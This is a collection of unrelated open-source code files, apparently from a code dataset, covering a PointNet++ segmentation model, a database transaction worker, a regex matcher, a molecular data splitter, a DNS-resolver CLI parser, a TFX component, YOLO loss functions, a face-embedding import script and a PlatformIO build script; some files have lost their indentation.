name="fp_{}".format(i+len(self.FP_confs)),
**self.FP_confs[i])
out = fluid.layers.transpose(features[0], perm=[0, 2, 1])
out = fluid.layers.unsqueeze(out, axes=[-1])
out = conv_bn(out, out_channels=128, bn=True, bn_momentum=bn_momentum, name="output_1")
out = fluid.layers.dropout(out, 0.5, dropout_implementation="upscale_in_train")
out = conv_bn(out, out_channels=self.num_classes, bn=False, act=None, name="output_2")
out = fluid.layers.squeeze(out, axes=[-1])
out = fluid.layers.transpose(out, perm=[0, 2, 1])
pred = fluid.layers.softmax(out)
# calc loss
self.loss = fluid.layers.cross_entropy(pred, self.label)
self.loss = fluid.layers.reduce_mean(self.loss)
# calc acc
pred = fluid.layers.reshape(pred, shape=[-1, self.num_classes])
label = fluid.layers.reshape(self.label, shape=[-1, 1])
self.acc1 = fluid.layers.accuracy(pred, label, k=1)
def get_feeds(self):
return self.feed_vars
def get_outputs(self):
return {"loss": self.loss, "accuracy": self.acc1}
def get_pyreader(self):
return self.pyreader
class PointNet2SemSegSSG(PointNet2SemSeg):
    def __init__(self, num_classes, num_points, use_xyz=True):
        super(PointNet2SemSegSSG, self).__init__(num_classes, num_points, use_xyz)
def model_config(self):
self.SA_confs = [
{
"npoint": 1024,
"radiuss": [0.1],
"nsamples": [32],
"mlps": [[32, 32, 64]],
},
{
"npoint": 256,
"radiuss": [0.2],
"nsamples": [32],
"mlps": [[64, 64, 128]],
},
{
"npoint": 64,
"radiuss": [0.4],
"nsamples": [32],
"mlps": [[128, 128, 256]],
},
{
"npoint": 16,
"radiuss": [0.8],
"nsamples": [32],
"mlps": [[256, 256, 512]],
},
]
self.FP_confs = [
{"mlp": [128, 128, 128]},
{"mlp": [256, 128]},
{"mlp": [256, 256]},
{"mlp": [256, 256]},
]
class PointNet2SemSegMSG(PointNet2SemSeg):
    def __init__(self, num_classes, num_points, use_xyz=True):
        super(PointNet2SemSegMSG, self).__init__(num_classes, num_points, use_xyz)
def model_config(self):
self.SA_confs = [
{
"npoint": 1024,
"radiuss": [0.05, 0.1],
"nsamples": [16, 32],
"mlps": [[16, 16, 32], [32, 32, 64]],
},
{
"npoint": 256,
"radiuss": [0.1, 0.2],
"nsamples": [16, 32],
"mlps": [[64, 64, 128], [64, 96, 128]],
},
{
"npoint": 64,
"radiuss": [0.2, 0.4],
"nsamples": [16, 32],
"mlps": [[128, 196, 256], [128, 196, 256]],
},
{
"npoint": 16,
"radiuss": [0.4, 0.8],
"nsamples": [16, 32],
"mlps": [[256, 256, 512], [256, 384, 512]],
},
]
self.FP_confs = [
{"mlp": [128, 128]},
{"mlp": [256, 256]},
{"mlp": [512, 512]},
{"mlp": [512, 512]},
]
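# Editor's illustrative sketch (assumes the static-graph paddle.fluid 1.x API
# used above is installed): build the SSG variant for a 13-class, 4096-point
# semantic segmentation task and fetch its loss/accuracy outputs.
if __name__ == "__main__":
    model = PointNet2SemSegSSG(num_classes=13, num_points=4096)
    model.build_model()
    outs = model.get_outputs()  # {"loss": ..., "accuracy": ...}
    print(outs)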
|
the-stack_106_23288 | from threading import Thread, Event
import os, datetime, uuid, time, math, ast
from typing import List, Dict
from alphaz.models.database.structure import AlphaDatabase
from alphaz.models.main import AlphaClass, AlphaTransaction
from ..libs import transactions_lib
from core import core
LOG = core.get_logger('requests')
DB = core.db
class TransactionsThread(Thread):
def __init__(self, function,
message_types:List[str] = [],
database: AlphaDatabase = DB,
interval: int = 2,
timeout: int = 0,
pool_size:int = 20,
answer_lifetime = 3600,
args = [],
kwargs = {}
):
Thread.__init__(self)
self.function = function
self.message_types:List[str] = message_types
self.database: AlphaDatabase = database
self.interval:str = interval
self.timeout = timeout
self.pool_size:int = pool_size
self.answer_lifetime: int = answer_lifetime
self.args:list = args
self.kwargs:dict = kwargs
self.started: Event = Event()
self.running: Event= Event()
self.finished: Event = Event()
def ensure(self):
if not self.started.is_set() and not self.running.is_set():
self.start()
def run(self):
self.started.set()
count = 0
offset = 0
elapsed = 0
dts = datetime.datetime.now()
while not self.finished.is_set() and (self.timeout <= 0 or elapsed < self.timeout):
dt = datetime.datetime.now()
if not self.running.is_set():
self.running.set()
if count == 0:
#secs = (math.ceil(dt) - dt).total_seconds()
secs = 0
else:
secs = self.interval - offset
self.finished.wait(secs)
if not self.finished.is_set():
t = time.time()
self.process()
offset = time.time() - t
count += 1
elapsed = (dt - dts).total_seconds()
if self.timeout > 0 and elapsed > self.timeout:
LOG.info("Thread reachs its limit")
else:
LOG.info("Thread ended")
def process(self):
requests = transactions_lib.get_requests(self.database, message_types=self.message_types, limit=self.pool_size)
if len(requests) == 0:
return
requests = [AlphaTransaction(x) for x in requests]
LOG.info('Processing %s requests ...'%len(requests))
uuids = []
for request in requests:
answer = ''
try:
uuid = request.uuid
parameters = request.message
uuids.append(uuid)
LOG.debug('REQUEST: \n\n'+str(parameters)+'\n')
if type(parameters) is not dict:
                    LOG.error('Request message is of the wrong type')
continue
answer = self.function(request, *self.args, **self.kwargs)
if answer is not None:
answer = str(answer)
LOG.debug('Sending answer: '+answer)
except Exception as ex:
LOG.error("Cannot send answser",ex=ex)
finally:
transactions_lib.send_answer(self.database, uuid, answer,
message_type=str(request.message_type), answer_lifetime=self.answer_lifetime)
transactions_lib.delete_requests(self.database, uuids)
def cancel(self):
self.finished.set()
self.started.clear()
        self.running.clear()
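# Editor's usage sketch (illustrative; the handler and message type are
# hypothetical): the thread polls the database every `interval` seconds and
# passes each pending AlphaTransaction to `function`; the string it returns is
# stored as the answer for that request.
def _echo_handler(transaction):
    return str(transaction.message)

if __name__ == "__main__":
    worker = TransactionsThread(_echo_handler, message_types=["demo"], interval=5)
    worker.ensure()   # starts the thread only if it is not already running
    # ... later, call worker.cancel() to stop polling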
the-stack_106_23290 | class Solution:
def isMatch(self, s: str, p: str) -> bool:
dp = [[False for _ in range(len(s) + 1)] for _ in range(len(p) + 1)]
dp[0][0] = True
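        # Editor's note: dp[i][j] is True iff pattern prefix p[:i] matches string prefix s[:j]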
for i in range(1,len(p)+1):
if p[i-1] == '*':
dp[i][0] = dp[i-2][0]
for i in range(1, len(p) + 1):
for j in range(1, len(s) + 1):
pChar = p[i-1]
schar = s[j-1]
pPrev = p[i-2] if i > 1 else ''
                if self.isCharMatch(pChar, schar):
dp[i][j] = dp[i-1][j-1]
elif pChar == '*':
                    if self.isCharMatch(pPrev, schar):
# using 1 of prev or multiple of prev
dp[i][j] = dp[i-1][j] or dp[i][j-1]
# using 0 of prev
if dp[i-2][j]:
dp[i][j] = True
return dp[len(p)][len(s)]
    def isCharMatch(self, pChar, sChar):
return pChar == '.' or pChar == sChar
ob = Solution()
source = "aasdfasdfasdfasdfas"
pattern = "aasdf.*asdf.*asdf.*asdf.*s"
print(ob.isMatch(source, pattern))
the-stack_106_23292 | import logging
import numpy as np
import torch
from rdkit import Chem
from rdkit import RDLogger
from rdkit.Chem.Scaffolds import MurckoScaffold
from federatedscope.core.splitters.utils import dirichlet_distribution_noniid_slice
from federatedscope.core.splitters.graph.scaffold_splitter import generate_scaffold
logger = logging.getLogger(__name__)
RDLogger.DisableLog('rdApp.*')
class GenFeatures:
r"""Implementation of 'CanonicalAtomFeaturizer' and 'CanonicalBondFeaturizer' in DGL.
Source: https://lifesci.dgl.ai/_modules/dgllife/utils/featurizers.html
Arguments:
data: PyG.data in PyG.dataset.
Returns:
data: PyG.data, data passing featurizer.
"""
def __init__(self):
self.symbols = [
'C', 'N', 'O', 'S', 'F', 'Si', 'P', 'Cl', 'Br', 'Mg',
'Na', 'Ca', 'Fe', 'As', 'Al', 'I', 'B', 'V', 'K', 'Tl',
'Yb', 'Sb', 'Sn', 'Ag', 'Pd', 'Co', 'Se', 'Ti', 'Zn',
'H', 'Li', 'Ge', 'Cu', 'Au', 'Ni', 'Cd', 'In', 'Mn',
'Zr', 'Cr', 'Pt', 'Hg', 'Pb', 'other'
]
self.hybridizations = [
Chem.rdchem.HybridizationType.SP,
Chem.rdchem.HybridizationType.SP2,
Chem.rdchem.HybridizationType.SP3,
Chem.rdchem.HybridizationType.SP3D,
Chem.rdchem.HybridizationType.SP3D2,
'other',
]
self.stereos = [
Chem.rdchem.BondStereo.STEREONONE,
Chem.rdchem.BondStereo.STEREOANY,
Chem.rdchem.BondStereo.STEREOZ,
Chem.rdchem.BondStereo.STEREOE,
Chem.rdchem.BondStereo.STEREOCIS,
Chem.rdchem.BondStereo.STEREOTRANS,
]
def __call__(self, data):
mol = Chem.MolFromSmiles(data.smiles)
xs = []
for atom in mol.GetAtoms():
symbol = [0.] * len(self.symbols)
if atom.GetSymbol() in self.symbols:
symbol[self.symbols.index(atom.GetSymbol())] = 1.
else:
symbol[self.symbols.index('other')] = 1.
degree = [0.] * 10
degree[atom.GetDegree()] = 1.
implicit = [0.] * 6
implicit[atom.GetImplicitValence()] = 1.
formal_charge = atom.GetFormalCharge()
radical_electrons = atom.GetNumRadicalElectrons()
hybridization = [0.] * len(self.hybridizations)
if atom.GetHybridization() in self.hybridizations:
hybridization[self.hybridizations.index(atom.GetHybridization())] = 1.
else:
hybridization[self.hybridizations.index('other')] = 1.
aromaticity = 1. if atom.GetIsAromatic() else 0.
hydrogens = [0.] * 5
hydrogens[atom.GetTotalNumHs()] = 1.
x = torch.tensor(symbol + degree + implicit +
[formal_charge] + [radical_electrons] +
hybridization + [aromaticity] + hydrogens)
xs.append(x)
data.x = torch.stack(xs, dim=0)
edge_attrs = []
for bond in mol.GetBonds():
bond_type = bond.GetBondType()
single = 1. if bond_type == Chem.rdchem.BondType.SINGLE else 0.
double = 1. if bond_type == Chem.rdchem.BondType.DOUBLE else 0.
triple = 1. if bond_type == Chem.rdchem.BondType.TRIPLE else 0.
aromatic = 1. if bond_type == Chem.rdchem.BondType.AROMATIC else 0.
conjugation = 1. if bond.GetIsConjugated() else 0.
ring = 1. if bond.IsInRing() else 0.
stereo = [0.] * 6
stereo[self.stereos.index(bond.GetStereo())] = 1.
edge_attr = torch.tensor(
[single, double, triple, aromatic, conjugation, ring] + stereo)
edge_attrs += [edge_attr, edge_attr]
if len(edge_attrs) == 0:
data.edge_index = torch.zeros((2, 0), dtype=torch.long)
data.edge_attr = torch.zeros((0, 10), dtype=torch.float)
else:
num_atoms = mol.GetNumAtoms()
feats = torch.stack(edge_attrs, dim=0)
feats = torch.cat([feats, torch.zeros(feats.shape[0], 1)], dim=1)
self_loop_feats = torch.zeros(num_atoms, feats.shape[1])
self_loop_feats[:, -1] = 1
feats = torch.cat([feats, self_loop_feats], dim=0)
data.edge_attr = feats
return data
def gen_scaffold_lda_split(dataset, client_num=5, alpha=0.1):
r"""
    Return a list of sample-index lists, one per client.
"""
logger.info('Scaffold split might take minutes, please wait...')
scaffolds = {}
for idx, data in enumerate(dataset):
smiles = data.smiles
mol = Chem.MolFromSmiles(smiles)
scaffold = generate_scaffold(smiles)
if scaffold not in scaffolds:
scaffolds[scaffold] = [idx]
else:
scaffolds[scaffold].append(idx)
# Sort from largest to smallest scaffold sets
scaffolds = {key: sorted(value) for key, value in scaffolds.items()}
scaffold_list = [
list(scaffold_set)
for (scaffold,
scaffold_set) in sorted(scaffolds.items(),
key=lambda x: (len(x[1]), x[1][0]),
reverse=True)
]
label = np.zeros(len(dataset))
for i in range(len(scaffold_list)):
label[scaffold_list[i]] = i+1
label = torch.LongTensor(label)
# Split data to list
idx_slice = dirichlet_distribution_noniid_slice(label, client_num, alpha)
return idx_slice
class ScaffoldLdaSplitter:
r"""First adopt scaffold splitting and then assign the samples to clients according to Latent Dirichlet Allocation.
Arguments:
dataset (List or PyG.dataset): The molecular datasets.
        alpha (float): Partition hyperparameter in LDA; a smaller alpha generates a more heterogeneous (non-IID) partition.
    Returns:
        data_list (List(List(PyG.data))): Dataset split via scaffold split followed by LDA assignment.
"""
def __init__(self, client_num, alpha):
self.client_num = client_num
self.alpha = alpha
def __call__(self, dataset):
featurizer = GenFeatures()
data = []
for ds in dataset:
ds = featurizer(ds)
data.append(ds)
dataset = data
idx_slice = gen_scaffold_lda_split(dataset, self.client_num, self.alpha)
data_list = [[dataset[idx] for idx in idxs] for idxs in idx_slice]
return data_list
def __repr__(self):
return f'{self.__class__.__name__}()'
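# Editor's usage sketch (illustrative; `dataset` is assumed to be a PyG
# molecular dataset whose Data objects carry a `.smiles` attribute, e.g. a
# MoleculeNet dataset):
#
#     splitter = ScaffoldLdaSplitter(client_num=5, alpha=0.1)
#     client_data = splitter(dataset)  # list of 5 lists of featurized PyG Data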
|
the-stack_106_23293 | """
Contains functions that handles command line parsing logic.
"""
import argparse
def create_parser():
"""
Creates a command line parser.
There are four arguments allowed for this parser:
(1) the dns server ip (required)
    (2) the domain name to be resolved (required)
(3) a verbose option, to print tracing information (optional)
(4) an ipv6 option, to return the ipv6 address for a domain name (optional)
:return: the command line argument parser
"""
parser = argparse.ArgumentParser(description='Simple DNS Resolver.')
parser.add_argument("dns_server_ip", type=str, nargs=1,
help='Consumes the IP address (IPv4 only) of a DNS Server.')
parser.add_argument("domain_name", type=str, nargs=1,
help='Consumes any valid, registered domain name.')
parser.add_argument("--verbose", type=bool, nargs=1,
                        help='If enabled, prints a trace of the resolution. (Input any value to set to true.)')
parser.add_argument("--ipv6", type=bool, nargs=1,
help='If enabled, retrieves the IPv6 of the domain name. (Input any value to set to true).')
    return parser
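# Editor's usage sketch (hypothetical entry point; the IP and domain are
# illustrative values only):
if __name__ == "__main__":
    args = create_parser().parse_args(["8.8.8.8", "example.com"])
    print(args.dns_server_ip[0], args.domain_name[0], args.verbose, args.ipv6)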
the-stack_106_23294 | # Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""TFX DataViewBinder component definition."""
from typing import Optional, Text
from tfx import types
from tfx.components.base import base_component
from tfx.components.base import executor_spec
from tfx.components.experimental.data_view import binder_executor
from tfx.types import artifact_utils
from tfx.types import channel_utils
from tfx.types import standard_artifacts
from tfx.types.component_spec import ChannelParameter
from tfx.types.component_spec import ComponentSpec
class _DataViewBinderComponentSpec(ComponentSpec):
"""ComponentSpec for Custom TFX Hello World Component."""
PARAMETERS = {}
INPUTS = {
'input_examples': ChannelParameter(type=standard_artifacts.Examples),
'data_view': ChannelParameter(type=standard_artifacts.DataView),
}
OUTPUTS = {
'output_examples': ChannelParameter(type=standard_artifacts.Examples),
}
class DataViewBinder(base_component.BaseComponent):
"""A component that binds a DataView to ExamplesArtifact.
It takes as inputs a channel of Examples and a channel of DataView, and
binds the DataView (i.e. attaching information from the DataView as custom
properties) to the Examples in the input channel, producing new Examples
Artifacts that are identical to the input Examples (including the uris),
except for the additional information attached.
Example:
```
# We assume Examples are imported by ExampleGen
example_gen = ...
# First, create a dataview:
data_view_provider = TfGraphDataViewProvider(
module_file=module_file,
create_decoder_func='create_decoder')
# Then, bind the DataView to Examples:
data_view_binder = DataViewBinder(
input_examples=example_gen.outputs['examples'],
data_view=data_view_provider.outputs['data_view'],
)
# Downstream component can then consume the output of the DataViewBinder:
stats_gen = StatisticsGen(
examples=data_view_binder.outputs['output_examples'], ...)
```
"""
SPEC_CLASS = _DataViewBinderComponentSpec
EXECUTOR_SPEC = executor_spec.ExecutorClassSpec(
binder_executor.DataViewBinderExecutor)
def __init__(self,
input_examples: types.Channel,
data_view: types.Channel,
output_examples: Optional[types.Channel] = None,
instance_name: Optional[Text] = None):
if not output_examples:
output_artifact = standard_artifacts.Examples()
output_artifact.copy_from(
artifact_utils.get_single_instance(list(input_examples.get())))
output_examples = channel_utils.as_channel([output_artifact])
spec = _DataViewBinderComponentSpec(
input_examples=input_examples,
data_view=data_view,
output_examples=output_examples)
super().__init__(spec=spec, instance_name=instance_name)
|
the-stack_106_23296 | # Loss functions
import torch
import torch.nn as nn
from ..utils.general import bbox_iou
from ..utils.torch_utils import is_parallel
def smooth_BCE(eps=0.1): # https://github.com/ultralytics/yolov3/issues/238#issuecomment-598028441
# return positive, negative label smoothing BCE targets
return 1.0 - 0.5 * eps, 0.5 * eps
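# Example (editor's note): smooth_BCE(eps=0.1) -> (0.95, 0.05), i.e. positive
# targets are softened to 0.95 and negative targets raised to 0.05.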
class BCEBlurWithLogitsLoss(nn.Module):
    # BCEWithLogitsLoss() with reduced missing label effects.
def __init__(self, alpha=0.05):
super(BCEBlurWithLogitsLoss, self).__init__()
self.loss_fcn = nn.BCEWithLogitsLoss(reduction='none') # must be nn.BCEWithLogitsLoss()
self.alpha = alpha
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
pred = torch.sigmoid(pred) # prob from logits
dx = pred - true # reduce only missing label effects
# dx = (pred - true).abs() # reduce missing label and false label effects
alpha_factor = 1 - torch.exp((dx - 1) / (self.alpha + 1e-4))
loss *= alpha_factor
return loss.mean()
class FocalLoss(nn.Module):
# Wraps focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(FocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
# p_t = torch.exp(-loss)
# loss *= self.alpha * (1.000001 - p_t) ** self.gamma # non-zero power for gradient stability
# TF implementation https://github.com/tensorflow/addons/blob/v0.7.1/tensorflow_addons/losses/focal_loss.py
pred_prob = torch.sigmoid(pred) # prob from logits
p_t = true * pred_prob + (1 - true) * (1 - pred_prob)
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = (1.0 - p_t) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
class QFocalLoss(nn.Module):
# Wraps Quality focal loss around existing loss_fcn(), i.e. criteria = FocalLoss(nn.BCEWithLogitsLoss(), gamma=1.5)
def __init__(self, loss_fcn, gamma=1.5, alpha=0.25):
super(QFocalLoss, self).__init__()
self.loss_fcn = loss_fcn # must be nn.BCEWithLogitsLoss()
self.gamma = gamma
self.alpha = alpha
self.reduction = loss_fcn.reduction
self.loss_fcn.reduction = 'none' # required to apply FL to each element
def forward(self, pred, true):
loss = self.loss_fcn(pred, true)
pred_prob = torch.sigmoid(pred) # prob from logits
alpha_factor = true * self.alpha + (1 - true) * (1 - self.alpha)
modulating_factor = torch.abs(true - pred_prob) ** self.gamma
loss *= alpha_factor * modulating_factor
if self.reduction == 'mean':
return loss.mean()
elif self.reduction == 'sum':
return loss.sum()
else: # 'none'
return loss
class ComputeLoss:
# Compute losses
def __init__(self, model, autobalance=False):
super(ComputeLoss, self).__init__()
device = next(model.parameters()).device # get model device
h = model.hyp # hyperparameters
# Define criteria
BCEcls = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([h['cls_pw']], device=device))
BCEobj = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([h['obj_pw']], device=device))
# Class label smoothing https://arxiv.org/pdf/1902.04103.pdf eqn 3
self.cp, self.cn = smooth_BCE(eps=h.get('label_smoothing', 0.0)) # positive, negative BCE targets
# Focal loss
g = h['fl_gamma'] # focal loss gamma
if g > 0:
BCEcls, BCEobj = FocalLoss(BCEcls, g), FocalLoss(BCEobj, g)
det = model.module.model[-1] if is_parallel(model) else model.model[-1] # Detect() module
self.balance = {3: [4.0, 1.0, 0.4]}.get(det.nl, [4.0, 1.0, 0.25, 0.06, .02]) # P3-P7
self.ssi = list(det.stride).index(16) if autobalance else 0 # stride 16 index
self.BCEcls, self.BCEobj, self.gr, self.hyp, self.autobalance = BCEcls, BCEobj, model.gr, h, autobalance
for k in 'na', 'nc', 'nl', 'anchors':
setattr(self, k, getattr(det, k))
def __call__(self, p, targets): # predictions, targets, model
device = targets.device
lcls, lbox, lobj = torch.zeros(1, device=device), torch.zeros(1, device=device), torch.zeros(1, device=device)
tcls, tbox, indices, anchors = self.build_targets(p, targets) # targets
# Losses
for i, pi in enumerate(p): # layer index, layer predictions
b, a, gj, gi = indices[i] # image, anchor, gridy, gridx
tobj = torch.zeros_like(pi[..., 0], device=device) # target obj
n = b.shape[0] # number of targets
if n:
ps = pi[b, a, gj, gi] # prediction subset corresponding to targets
# Regression
pxy = ps[:, :2].sigmoid() * 2. - 0.5
pwh = (ps[:, 2:4].sigmoid() * 2) ** 2 * anchors[i]
pbox = torch.cat((pxy, pwh), 1) # predicted box
iou = bbox_iou(pbox.T, tbox[i], x1y1x2y2=False, CIoU=True) # iou(prediction, target)
lbox += (1.0 - iou).mean() # iou loss
# Objectness
tobj[b, a, gj, gi] = (1.0 - self.gr) + self.gr * iou.detach().clamp(0).type(tobj.dtype) # iou ratio
# Classification
if self.nc > 1: # cls loss (only if multiple classes)
t = torch.full_like(ps[:, 5:], self.cn, device=device) # targets
t[range(n), tcls[i]] = self.cp
lcls += self.BCEcls(ps[:, 5:], t) # BCE
# Append targets to text file
# with open('targets.txt', 'a') as file:
# [file.write('%11.5g ' * 4 % tuple(x) + '\n') for x in torch.cat((txy[i], twh[i]), 1)]
obji = self.BCEobj(pi[..., 4], tobj)
lobj += obji * self.balance[i] # obj loss
if self.autobalance:
self.balance[i] = self.balance[i] * 0.9999 + 0.0001 / obji.detach().item()
if self.autobalance:
self.balance = [x / self.balance[self.ssi] for x in self.balance]
lbox *= self.hyp['box']
lobj *= self.hyp['obj']
lcls *= self.hyp['cls']
bs = tobj.shape[0] # batch size
loss = lbox + lobj + lcls
return loss * bs, torch.cat((lbox, lobj, lcls, loss)).detach()
def build_targets(self, p, targets):
# Build targets for compute_loss(), input targets(image,class,x,y,w,h)
na, nt = self.na, targets.shape[0] # number of anchors, targets
tcls, tbox, indices, anch = [], [], [], []
gain = torch.ones(7, device=targets.device) # normalized to gridspace gain
ai = torch.arange(na, device=targets.device).float().view(na, 1).repeat(1, nt) # same as .repeat_interleave(nt)
targets = torch.cat((targets.repeat(na, 1, 1), ai[:, :, None]), 2) # append anchor indices
g = 0.5 # bias
off = torch.tensor([[0, 0],
[1, 0], [0, 1], [-1, 0], [0, -1], # j,k,l,m
# [1, 1], [1, -1], [-1, 1], [-1, -1], # jk,jm,lk,lm
], device=targets.device).float() * g # offsets
for i in range(self.nl):
anchors = self.anchors[i]
gain[2:6] = torch.tensor(p[i].shape)[[3, 2, 3, 2]] # xyxy gain
# Match targets to anchors
t = targets * gain
if nt:
# Matches
r = t[:, :, 4:6] / anchors[:, None] # wh ratio
j = torch.max(r, 1. / r).max(2)[0] < self.hyp['anchor_t'] # compare
# j = wh_iou(anchors, t[:, 4:6]) > model.hyp['iou_t'] # iou(3,n)=wh_iou(anchors(3,2), gwh(n,2))
t = t[j] # filter
# Offsets
gxy = t[:, 2:4] # grid xy
gxi = gain[[2, 3]] - gxy # inverse
j, k = ((gxy % 1. < g) & (gxy > 1.)).T
l, m = ((gxi % 1. < g) & (gxi > 1.)).T
j = torch.stack((torch.ones_like(j), j, k, l, m))
t = t.repeat((5, 1, 1))[j]
offsets = (torch.zeros_like(gxy)[None] + off[:, None])[j]
else:
t = targets[0]
offsets = 0
# Define
b, c = t[:, :2].long().T # image, class
gxy = t[:, 2:4] # grid xy
gwh = t[:, 4:6] # grid wh
gij = (gxy - offsets).long()
gi, gj = gij.T # grid xy indices
# Append
a = t[:, 6].long() # anchor indices
indices.append((b, a, gj.clamp_(0, gain[3] - 1), gi.clamp_(0, gain[2] - 1))) # image, anchor, grid indices
tbox.append(torch.cat((gxy - gij, gwh), 1)) # box
anch.append(anchors[a]) # anchors
tcls.append(c) # class
return tcls, tbox, indices, anch
|
the-stack_106_23298 | # -*- coding: UTF-8 -*-
import os
import numpy as np
from migrate_db import People, db, app
uuid = '28DDU17531000102'
embedding_basedir = '/home/actiontec/PycharmProjects/DeepLearning/FaceRecognition/facenet/src/faces/' \
'ae64c98bdff9b674fb5dad4b/front/face_embedding'
url = ''
style = 'front'
group_id = 'ae64c98bdff9b674fb5dad4b'
def txt2embedding(file_path):
with open(file_path, 'r') as bottleneck_file:
bottleneck_string = bottleneck_file.read()
# print(bottleneck_string)
bottleneck_values = [float(x) for x in bottleneck_string.split(',')]
embedding = np.array(bottleneck_values, dtype='f')
return embedding
if __name__ == '__main__':
with app.app_context():
for root, dirs, files in os.walk(embedding_basedir):
for name in files:
file_path = os.path.join(root, name)
objid = root.split('_')[-1]
embedding = txt2embedding(file_path)
people = People(embed=embedding, uuid=uuid, group_id=group_id,
objId=objid, aliyun_url=url, classId=objid, style=style)
db.session.add(people)
db.session.commit()
|
the-stack_106_23299 | # Copyright (c) 2014-present PlatformIO <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import sys
from time import time
import click
from SCons.Script import ARGUMENTS # pylint: disable=import-error
from SCons.Script import COMMAND_LINE_TARGETS # pylint: disable=import-error
from SCons.Script import DEFAULT_TARGETS # pylint: disable=import-error
from SCons.Script import AllowSubstExceptions # pylint: disable=import-error
from SCons.Script import AlwaysBuild # pylint: disable=import-error
from SCons.Script import Default # pylint: disable=import-error
from SCons.Script import DefaultEnvironment # pylint: disable=import-error
from SCons.Script import Import # pylint: disable=import-error
from SCons.Script import Variables # pylint: disable=import-error
from platformio import compat, fs
from platformio.platform.base import PlatformBase
from platformio.proc import get_pythonexe_path
from platformio.project.helpers import get_project_dir
AllowSubstExceptions(NameError)
# append CLI arguments to build environment
clivars = Variables(None)
clivars.AddVariables(
("PLATFORM_MANIFEST",),
("BUILD_SCRIPT",),
("PROJECT_CONFIG",),
("PIOENV",),
("PIOTEST_RUNNING_NAME",),
("UPLOAD_PORT",),
)
DEFAULT_ENV_OPTIONS = dict(
tools=[
"ar",
"as",
"cc",
"c++",
"link",
"platformio",
"piotarget",
"pioplatform",
"pioproject",
"piomaxlen",
"piolib",
"pioupload",
"piomisc",
"pioide",
"piosize",
],
toolpath=[os.path.join(fs.get_source_dir(), "builder", "tools")],
variables=clivars,
# Propagating External Environment
ENV=os.environ,
UNIX_TIME=int(time()),
BUILD_DIR=os.path.join("$PROJECT_BUILD_DIR", "$PIOENV"),
BUILD_SRC_DIR=os.path.join("$BUILD_DIR", "src"),
BUILD_TEST_DIR=os.path.join("$BUILD_DIR", "test"),
COMPILATIONDB_PATH=os.path.join("$BUILD_DIR", "compile_commands.json"),
LIBPATH=["$BUILD_DIR"],
PROGNAME="program",
PROG_PATH=os.path.join("$BUILD_DIR", "$PROGNAME$PROGSUFFIX"),
PYTHONEXE=get_pythonexe_path(),
IDE_EXTRA_DATA={},
)
# Declare command verbose messages
command_strings = dict(
ARCOM="Archiving",
LINKCOM="Linking",
RANLIBCOM="Indexing",
ASCOM="Compiling",
ASPPCOM="Compiling",
CCCOM="Compiling",
CXXCOM="Compiling",
)
if not int(ARGUMENTS.get("PIOVERBOSE", 0)):
for name, value in command_strings.items():
DEFAULT_ENV_OPTIONS["%sSTR" % name] = "%s $TARGET" % (value)
env = DefaultEnvironment(**DEFAULT_ENV_OPTIONS)
# Load variables from CLI
env.Replace(
**{
key: PlatformBase.decode_scons_arg(env[key])
for key in list(clivars.keys())
if key in env
}
)
# Setup project optional directories
config = env.GetProjectConfig()
env.Replace(
PROJECT_DIR=get_project_dir(),
PROJECT_CORE_DIR=config.get_optional_dir("core"),
PROJECT_PACKAGES_DIR=config.get_optional_dir("packages"),
PROJECT_WORKSPACE_DIR=config.get_optional_dir("workspace"),
PROJECT_LIBDEPS_DIR=config.get_optional_dir("libdeps"),
PROJECT_INCLUDE_DIR=config.get_optional_dir("include"),
PROJECT_SRC_DIR=config.get_optional_dir("src"),
PROJECTSRC_DIR=config.get_optional_dir("src"), # legacy for dev/platform
PROJECT_TEST_DIR=config.get_optional_dir("test"),
PROJECT_DATA_DIR=config.get_optional_dir("data"),
PROJECTDATA_DIR=config.get_optional_dir("data"), # legacy for dev/platform
PROJECT_BUILD_DIR=config.get_optional_dir("build"),
BUILD_CACHE_DIR=config.get_optional_dir("build_cache"),
LIBSOURCE_DIRS=[
config.get_optional_dir("lib"),
os.path.join("$PROJECT_LIBDEPS_DIR", "$PIOENV"),
config.get_optional_dir("globallib"),
],
)
if (
compat.IS_WINDOWS
and sys.version_info >= (3, 8)
and env["PROJECT_DIR"].startswith("\\\\")
):
click.secho(
"There is a known issue with Python 3.8+ and mapped network drives on "
"Windows.\nSee a solution at:\n"
"https://github.com/platformio/platformio-core/issues/3417",
fg="yellow",
)
if env.subst("$BUILD_CACHE_DIR"):
if not os.path.isdir(env.subst("$BUILD_CACHE_DIR")):
os.makedirs(env.subst("$BUILD_CACHE_DIR"))
env.CacheDir("$BUILD_CACHE_DIR")
if int(ARGUMENTS.get("ISATTY", 0)):
# pylint: disable=protected-access
click._compat.isatty = lambda stream: True
if env.GetOption("clean"):
env.PioClean(env.subst("$BUILD_DIR"))
env.Exit(0)
elif not int(ARGUMENTS.get("PIOVERBOSE", 0)):
click.echo("Verbose mode can be enabled via `-v, --verbose` option")
# Dynamically load dependent tools
if "compiledb" in COMMAND_LINE_TARGETS:
